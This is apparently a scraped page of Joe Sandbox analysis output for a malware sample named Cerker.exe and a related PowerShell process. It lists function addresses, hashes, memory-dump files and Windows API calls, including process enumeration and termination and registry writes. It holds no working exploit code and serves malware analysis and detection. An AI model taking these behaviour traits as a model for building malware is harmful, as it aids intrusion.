Opcode ID: 7318eadc58497cca88e3434922e931edcc1cf0f926b9b9ccc5c355aa77be4e81
Instruction ID: 246ff1b40d5e4ea822d2f090b5dc3a2d75182420e6ef578d23bd0e97f60cc679
Opcode Fuzzy Hash: 7318eadc58497cca88e3434922e931edcc1cf0f926b9b9ccc5c355aa77be4e81
Instruction Fuzzy Hash: E241BD7290068CABDB11ABBDCC46BAE37A9FF45370F240510FA14E7199EB749C508762

Function 008F35F6 Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

Part of subcall function 008E8544: _free.LIBCMT ref: 008E8552

Part of subcall function 008F31EB: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,00000000,00000000,?,008F0B70,?,00000000,00000000), ref: 008F3297

GetLastError.KERNEL32 ref: 008F365E
__dosmaperr.LIBCMT ref: 008F3665
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 008F36A4
__dosmaperr.LIBCMT ref: 008F36AB

Memory Dump Source

Source File: 00000007.00000002.1742592579.00000000008C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000007.00000002.1742565177.00000000008C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742637083.00000000008FD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742671172.000000000090E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742702576.0000000000911000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8c0000_Cerker.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
String ID:
API String ID: 167067550-0
Opcode ID: a560a44ced156a07c46ae9fb18766b39a43599ff02547bf9aef657f566556648
Instruction ID: 0f6c66ab942d6823554395849be7ce36e8386a52794c095b22d015637827e888
Opcode Fuzzy Hash: a560a44ced156a07c46ae9fb18766b39a43599ff02547bf9aef657f566556648
Instruction Fuzzy Hash: 4121A47160420DBFDB20AF769C80D7AB79DFF103647208518FA19D7251DB35EE50A7A1

Function 008EBBF0 Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(008C1920,00000001,008C1924,008E5E6D,00000001,00000000,00000000,?,008EBEE5,00000000,00000000,00000001,00000000,008C1920,00000104), ref: 008EBBF5
_free.LIBCMT ref: 008EBC52
_free.LIBCMT ref: 008EBC88
SetLastError.KERNEL32(00000000,00000006,000000FF,?,008EBEE5,00000000,00000000,00000001,00000000,008C1920,00000104), ref: 008EBC93

Memory Dump Source

Source File: 00000007.00000002.1742592579.00000000008C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000007.00000002.1742565177.00000000008C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742637083.00000000008FD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742671172.000000000090E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742702576.0000000000911000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8c0000_Cerker.jbxd

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 03ddcc8e456b9299372ea155e283056c451aa77c66eb8677d96f6a5802f9fa68
Instruction ID: f6aad9209e4263a0f1db18b443899803bf31d8831a5453baade2bda7ffa9b24b
Opcode Fuzzy Hash: 03ddcc8e456b9299372ea155e283056c451aa77c66eb8677d96f6a5802f9fa68
Instruction Fuzzy Hash: AF114C7260C6C56ED60123BF9C86D2B2259FBC33B5F340A34F220D61D1DF718D015251

Function 008EBD47 Relevance: 6.1, APIs: 4, Instructions: 69COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,008E7C8B,008EFB20,?,?,008E0A38,?,?,?,?,?,008C11E3,?,?), ref: 008EBD4C
_free.LIBCMT ref: 008EBDA9
_free.LIBCMT ref: 008EBDDF
SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,008E0A38,?,?,?,?,?,008C11E3,?,?), ref: 008EBDEA

Memory Dump Source

Source File: 00000007.00000002.1742592579.00000000008C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000007.00000002.1742565177.00000000008C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742637083.00000000008FD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742671172.000000000090E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742702576.0000000000911000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8c0000_Cerker.jbxd

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: f273f35f3cc5e21e199604df6766377b3c5072a45010e2dbcae5ab7406b21575
Instruction ID: 81eb22ae0fc13466ee7b535377aa410c0c31c4716a172b257f07886fb0d329a6
Opcode Fuzzy Hash: f273f35f3cc5e21e199604df6766377b3c5072a45010e2dbcae5ab7406b21575
Instruction Fuzzy Hash: 60112672708AD4AED65127BF9C86E6B265AFBC73B4B280734F624C32E1DF718D015212

Function 008C1330 Relevance: 6.1, APIs: 4, Instructions: 53COMMON

Download Yara Rule

APIs

K32EnumProcesses.KERNEL32(?,00001000,?), ref: 008C134D
OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 008C1397
TerminateProcess.KERNEL32(00000000,00000000), ref: 008C13A2
CloseHandle.KERNEL32(00000000), ref: 008C13A9

Memory Dump Source

Source File: 00000007.00000002.1742592579.00000000008C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000007.00000002.1742565177.00000000008C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742637083.00000000008FD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742671172.000000000090E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742702576.0000000000911000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8c0000_Cerker.jbxd

Similarity

API ID: Process$CloseEnumHandleOpenProcessesTerminate
String ID:
API String ID: 1176117389-0
Opcode ID: 2c1fb2a5f1b35f607d05c711b5c1586d1475dec1d17ef9b8a35b44fdc5b31659
Instruction ID: 1d5c474b15cdd728b4a4ab8de1264cd904194c8b056ee12a4f139b5148bea2ca
Opcode Fuzzy Hash: 2c1fb2a5f1b35f607d05c711b5c1586d1475dec1d17ef9b8a35b44fdc5b31659
Instruction Fuzzy Hash: 3101D4726002486BDF109AF8AC89FEE33ADFB4A755F0001A5FB08D2341EA65DD414666

Function 008C9460 Relevance: 6.0, APIs: 4, Instructions: 43registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(?,?,00000000,00000002,?), ref: 008C947C
RegSetValueExA.ADVAPI32(?,?,00000000,00000001,00000010,?), ref: 008C94A9
RegCloseKey.ADVAPI32(?), ref: 008C94B6
RegCloseKey.ADVAPI32(?), ref: 008C94C0

Memory Dump Source

Source File: 00000007.00000002.1742592579.00000000008C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000007.00000002.1742565177.00000000008C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742637083.00000000008FD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742671172.000000000090E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742702576.0000000000911000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8c0000_Cerker.jbxd

Similarity

API ID: Close$OpenValue
String ID:
API String ID: 3951040859-0
Opcode ID: 46ad60ce8af9054479aec06dce816a7aabe4367ada7c516ee6212ceadfb7b4e6
Instruction ID: f49ba7983a3e81f06dd52812e11e7b8679ed6e884659ca277d2ce5c481bf238a
Opcode Fuzzy Hash: 46ad60ce8af9054479aec06dce816a7aabe4367ada7c516ee6212ceadfb7b4e6
Instruction Fuzzy Hash: 2F01C430240608FFEF089F64D849F6A377AFB85705F508498F6158B2A1DB72E952DB68

Function 008FB64D Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,00000000,00000010,00000000,00000000,?,008F7FB2,00000000,00000001,00000000,00000000,?,008ED38D,?,00000010,00000000), ref: 008FB664
GetLastError.KERNEL32(?,008F7FB2,00000000,00000001,00000000,00000000,?,008ED38D,?,00000010,00000000,?,00000000,?,008ED8D9,00000010), ref: 008FB670

Part of subcall function 008FB636: CloseHandle.KERNEL32(FFFFFFFE,008FB680,?,008F7FB2,00000000,00000001,00000000,00000000,?,008ED38D,?,00000010,00000000,?,00000000), ref: 008FB646

___initconout.LIBCMT ref: 008FB680

Part of subcall function 008FB5F8: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,008FB627,008F7F9F,00000000,?,008ED38D,?,00000010,00000000,?), ref: 008FB60B

WriteConsoleW.KERNEL32(00000000,00000000,00000010,00000000,?,008F7FB2,00000000,00000001,00000000,00000000,?,008ED38D,?,00000010,00000000,?), ref: 008FB695

Memory Dump Source

Source File: 00000007.00000002.1742592579.00000000008C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000007.00000002.1742565177.00000000008C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742637083.00000000008FD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742671172.000000000090E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742702576.0000000000911000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8c0000_Cerker.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: d06f49bd4d0223ae0500d04119323a53c2040aa80d1df559340822f2f879a444
Instruction ID: e26a8aa3cd5316b87a1cc5af554a4fa57e73e88db0cbf1cc59bef85bf6d950c9
Opcode Fuzzy Hash: d06f49bd4d0223ae0500d04119323a53c2040aa80d1df559340822f2f879a444
Instruction Fuzzy Hash: B3F0AC3A501659BBCF621FA5DC08EAE3F66FB583A1F044410FB19D5161CB328920EB95

Function 008EADFF Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 008EAE08

Part of subcall function 008EBF97: HeapFree.KERNEL32(00000000,00000000,?,008F5589,?,00000000,?,?,?,008F582C,?,00000007,?,?,008F5D1F,?), ref: 008EBFAD
Part of subcall function 008EBF97: GetLastError.KERNEL32(?,?,008F5589,?,00000000,?,?,?,008F582C,?,00000007,?,?,008F5D1F,?,?), ref: 008EBFBF

_free.LIBCMT ref: 008EAE1B
_free.LIBCMT ref: 008EAE2C
_free.LIBCMT ref: 008EAE3D

Memory Dump Source

Source File: 00000007.00000002.1742592579.00000000008C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000007.00000002.1742565177.00000000008C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742637083.00000000008FD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742671172.000000000090E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742702576.0000000000911000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8c0000_Cerker.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: dcc57a1d1524733901e70ac2befd262dba5490874f6e3298fa1d6f7ce8f3b5af
Instruction ID: 04ff534630dce63d16aef7c84134c15937451242877ce8775d22251994901176
Opcode Fuzzy Hash: dcc57a1d1524733901e70ac2befd262dba5490874f6e3298fa1d6f7ce8f3b5af
Instruction Fuzzy Hash: 74E01A7182C760BFC6112F59FC024863E21EB85B503104016F44482232CFB60391FF82

Function 008CE130 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 206COMMON

Download Yara Rule

APIs

std::ios_base::_Ios_base_dtor.LIBCPMT ref: 008CE460

Strings

0, xrefs: 008CE35A
H, xrefs: 008CE29C

Memory Dump Source

Source File: 00000007.00000002.1742592579.00000000008C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000007.00000002.1742565177.00000000008C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742637083.00000000008FD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742671172.000000000090E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742702576.0000000000911000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8c0000_Cerker.jbxd

Similarity

API ID: Ios_base_dtorstd::ios_base::_
String ID: 0$H
API String ID: 323602529-1388647558
Opcode ID: ddb379383ac2f4395530571c90a74d96da4e93287c92f531cc4ac1dce13bf370
Instruction ID: 6a0c3ceb39a93b7e1c82ff7210d3d21e24ad9b9907d7db198deb9738c74ab0e3
Opcode Fuzzy Hash: ddb379383ac2f4395530571c90a74d96da4e93287c92f531cc4ac1dce13bf370
Instruction Fuzzy Hash: CEA12970A002589FDB24CF68C884BDEBBB5FF49304F1481E9E549AB341DB70AA88CF51

Function 008E826D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 008E82FD

Strings

pow, xrefs: 008E82D5, 008E82F2

Memory Dump Source

Source File: 00000007.00000002.1742592579.00000000008C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000007.00000002.1742565177.00000000008C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742637083.00000000008FD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742671172.000000000090E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742702576.0000000000911000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8c0000_Cerker.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: de3d923f871402d31af3f0cb4e22f3913f9a83bdbd89d87cdfd4fb78a8b9fac3
Instruction ID: 2be7697ba0971dbf50f60b502b5af15d90dcb5d26510bee0a434d95db1407787
Opcode Fuzzy Hash: de3d923f871402d31af3f0cb4e22f3913f9a83bdbd89d87cdfd4fb78a8b9fac3
Instruction Fuzzy Hash: 6E51AD60A2C54ACBCB217729CD0137E6BA4FB41B10F348D59F1D9C23E9EF348C91AA46

Function 008E8B3C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON

Download Yara Rule

Strings

C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe, xrefs: 008E8B7F, 008E8B86, 008E8BBC

Memory Dump Source

Source File: 00000007.00000002.1742592579.00000000008C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000007.00000002.1742565177.00000000008C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742637083.00000000008FD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742671172.000000000090E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742702576.0000000000911000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8c0000_Cerker.jbxd

Similarity

API ID:
String ID: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe
API String ID: 0-4014939595
Opcode ID: 931f4507667dcf71c4c1b0e2b002527659e8b28e3952ca7abc937fc6172f914c
Instruction ID: 94d92ab96f7cf712d3aa8a14693afeeb0f5e4c6687916f2fef46da79cc9d57a7
Opcode Fuzzy Hash: 931f4507667dcf71c4c1b0e2b002527659e8b28e3952ca7abc937fc6172f914c
Instruction Fuzzy Hash: 904193B1A04298EFDB619B9ADD8199EBBB8FF86710B200066E508D7251DB709A40D761

Function 008E28C0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 008E28FF
__IsNonwritableInCurrentImage.LIBCMT ref: 008E29B3

Strings

csm, xrefs: 008E299D

Memory Dump Source

Source File: 00000007.00000002.1742592579.00000000008C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000007.00000002.1742565177.00000000008C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742637083.00000000008FD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742671172.000000000090E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742702576.0000000000911000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8c0000_Cerker.jbxd

Similarity

API ID: CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 3480331319-1018135373
Opcode ID: 9e129e3a974575027d074526224f1d29bcd9c3241a55f6e453b2e89dc74428b1
Instruction ID: 627c3040e7303d23864cf3ab02481a48880f42cdffdf47ef15dcbb1aa47c829f
Opcode Fuzzy Hash: 9e129e3a974575027d074526224f1d29bcd9c3241a55f6e453b2e89dc74428b1
Instruction Fuzzy Hash: 3C41B430A002599BCF14EF69C884AAEBFB9FF46324F148165E814DB393C771AE41CB91

Function 008E31D2 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 008E31F7

Strings

RCC, xrefs: 008E3211
MOC, xrefs: 008E3209

Memory Dump Source

Source File: 00000007.00000002.1742592579.00000000008C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000007.00000002.1742565177.00000000008C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742637083.00000000008FD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742671172.000000000090E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742702576.0000000000911000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8c0000_Cerker.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 5360480a4156428bde656c643a099ffdbe72d78d840cf382fe7278d48ae391a0
Instruction ID: d8321e57e317020569e12d2ec31b5e050a169c2d61ccfca94350e135e5aa70a5
Opcode Fuzzy Hash: 5360480a4156428bde656c643a099ffdbe72d78d840cf382fe7278d48ae391a0
Instruction Fuzzy Hash: 69419A71900289AFCF16CF99CC86AEEBBB5FF4A301F1481A9FA44A7211D3319E50CB51

Function 008C2070 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 008C2078
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 008C20BC

Part of subcall function 008DE9C0: _Yarn.LIBCPMT ref: 008DE9DF
Part of subcall function 008DE9C0: _Yarn.LIBCPMT ref: 008DEA03

Strings

bad locale name, xrefs: 008C20CB

Memory Dump Source

Source File: 00000007.00000002.1742592579.00000000008C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000007.00000002.1742565177.00000000008C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742637083.00000000008FD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742671172.000000000090E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742702576.0000000000911000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8c0000_Cerker.jbxd

Similarity

API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name
API String ID: 1908188788-1405518554
Opcode ID: 1aa3a43a57c20f79efa22cb0dd8e9fbc5a19d3d70bd1b2a16bb89f67997417bc
Instruction ID: f3f63499c73d28820f508f2eb7f742c25cb684d8336f756e404597d675a9cc2f
Opcode Fuzzy Hash: 1aa3a43a57c20f79efa22cb0dd8e9fbc5a19d3d70bd1b2a16bb89f67997417bc
Instruction Fuzzy Hash: 74F0F971101B409ED370AF799415747BFE4EF25714F044A1EE68AC7B42E375E508CBA6

Function 008DE22A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00001388), ref: 008DE272
___std_exception_destroy.LIBVCRUNTIME ref: 008DE289

Strings

Unknown exception, xrefs: 008DE22D, 008DE23D

Memory Dump Source

Source File: 00000007.00000002.1742592579.00000000008C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000007.00000002.1742565177.00000000008C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742637083.00000000008FD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742671172.000000000090E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742702576.0000000000911000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8c0000_Cerker.jbxd

Similarity

API ID: Sleep___std_exception_destroy
String ID: Unknown exception
API String ID: 2427919145-410509341
Opcode ID: 0c97af5bc3707833e84f210e3b1d2321343d95ec94ead1fa7fae28bf76011526
Instruction ID: 922647f5b16d922e600d4b0b8c0f249dec1fdc1b2bd243303f5d360b9d853dd7
Opcode Fuzzy Hash: 0c97af5bc3707833e84f210e3b1d2321343d95ec94ead1fa7fae28bf76011526
Instruction Fuzzy Hash: 90F0B4B07003145BDB18AB689C51A7D37A5FB84700F80005EB70AD7382DA70AF0586A7

Analysis Process: powershell.exePID: 7452, Parent PID: 1044COMMON

Executed Functions

Function 00007FFD9BB86605 Relevance: 2.9, Strings: 2, Instructions: 439COMMON

Download Yara Rule

Strings

q, xrefs: 00007FFD9BB86648
X7Vi, xrefs: 00007FFD9BB867FD

Memory Dump Source

Source File: 0000000B.00000002.2527526369.00007FFD9BB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9bb80000_powershell.jbxd

Similarity

API ID:
String ID: X7Vi$q
API String ID: 0-1033129842
Opcode ID: 93987f1559470ef309158a7297f0b829e7dda80a02397b6b26be55d5f20eb914
Instruction ID: 46257140b48c724baa6e436b53f04a7efe16a5834d68ebd37d06e2020d122346
Opcode Fuzzy Hash: 93987f1559470ef309158a7297f0b829e7dda80a02397b6b26be55d5f20eb914
Instruction Fuzzy Hash: E6D12822A0FACE4FEBA59B6858655B57B90FF16318F0901FFD45EC70E7D928A805C341

Function 00007FFD9BB84073 Relevance: .2, Instructions: 183COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2527526369.00007FFD9BB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9bb80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd6c72a1110c10a73571c65c9927f855fc2fa775e9a15beee2befe8a4df76b85
Instruction ID: 4b4b131a8a8e6e3b7cdf0abf8ebe2f86972ae6bcbaf3d8eefc05875c627ba16d
Opcode Fuzzy Hash: dd6c72a1110c10a73571c65c9927f855fc2fa775e9a15beee2befe8a4df76b85
Instruction Fuzzy Hash: 78512522B0EE4E0FE7AAEA6C44226757BD2EF95324F1901BED15DC71E3DE24E8018341

Function 00007FFD9BAB9827 Relevance: .2, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2526080240.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9bab0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f57f11327f84d456ebd5505a61c85bca18748e8f32f7a2627a0cc473c31619b
Instruction ID: 013eed7ec1e671daa7a0eda7d0252f4442994f5c3cde085d22f55e37f21e7f39
Opcode Fuzzy Hash: 3f57f11327f84d456ebd5505a61c85bca18748e8f32f7a2627a0cc473c31619b
Instruction Fuzzy Hash: 4E413C72A0CB884FE7189F5C981E6F97BE0FF65711F04422FD4A983152EB617511CB82

Function 00007FFD9BB84370 Relevance: .2, Instructions: 150COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2527526369.00007FFD9BB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9bb80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c97fcfbba3eef4be7c3960fde6291bd928a4b345e0b00b1c9f186cea4e8eb073
Instruction ID: 09a067a8cf7501996e1fbd8a634cd62f58e03097b860c6902ee04e3dd21b433b
Opcode Fuzzy Hash: c97fcfbba3eef4be7c3960fde6291bd928a4b345e0b00b1c9f186cea4e8eb073
Instruction Fuzzy Hash: EE41C222B0EE8D0FEBA9D6685461AB477D1EF85328F4901BED15DC71E7E928AD018381

Function 00007FFD9BABA59C Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2526080240.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9bab0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9da85bc2d57167b7df42cb2cd06d2715f28ab40cfc01fbda73b33a92f6c36a6f
Instruction ID: 0e5a85535bf6d44561af02990962f4d0685a8bb58563a3454586f1e3720eb22d
Opcode Fuzzy Hash: 9da85bc2d57167b7df42cb2cd06d2715f28ab40cfc01fbda73b33a92f6c36a6f
Instruction Fuzzy Hash: F921283090CA4C4FDB59DB9CD84A7E97BE0EB56321F04426FD049C3152DA74A406CB91

Function 00007FFD9BB840BF Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2527526369.00007FFD9BB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9bb80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a37ce803f885758d36c933bf895792e31e172207e1ff793b3e269d6c0564cfe
Instruction ID: e90905bd4ad169787f3d91fe06c15eafbd47dce6471e4a7c51fe56f5c4194b67
Opcode Fuzzy Hash: 6a37ce803f885758d36c933bf895792e31e172207e1ff793b3e269d6c0564cfe
Instruction Fuzzy Hash: 8821A022B0EE8B4FE7B6EA5844625756AD2EF55328F5A01BED05DC71F2DE38EC048341

Function 00007FFD9BB843BC Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2527526369.00007FFD9BB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9bb80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac1d2c99c75d29b9236e3476461df4516bdd59c692cf1569dfffe6acfe791331
Instruction ID: 09ba9be9f77b1d53248740ff2e9d3bd2a2499d0ef93f9e0f943290e1d993b707
Opcode Fuzzy Hash: ac1d2c99c75d29b9236e3476461df4516bdd59c692cf1569dfffe6acfe791331
Instruction Fuzzy Hash: 2211A032F0FA8A0FE7B5EAA854755B876D1FF45228F4A00BED15DC71E6ED29AD008341

Function 00007FFD9B99E41C Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2523642341.00007FFD9B99D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B99D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9b99d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb0d7d0209c89bffcf5b983814135b27a86cb46b4377b72d6c90d8322ec72af2
Instruction ID: fb216330268a01b2dc95b2a7bc28bab2213ef5c5e0cf40e317d0046ac7ca2b56
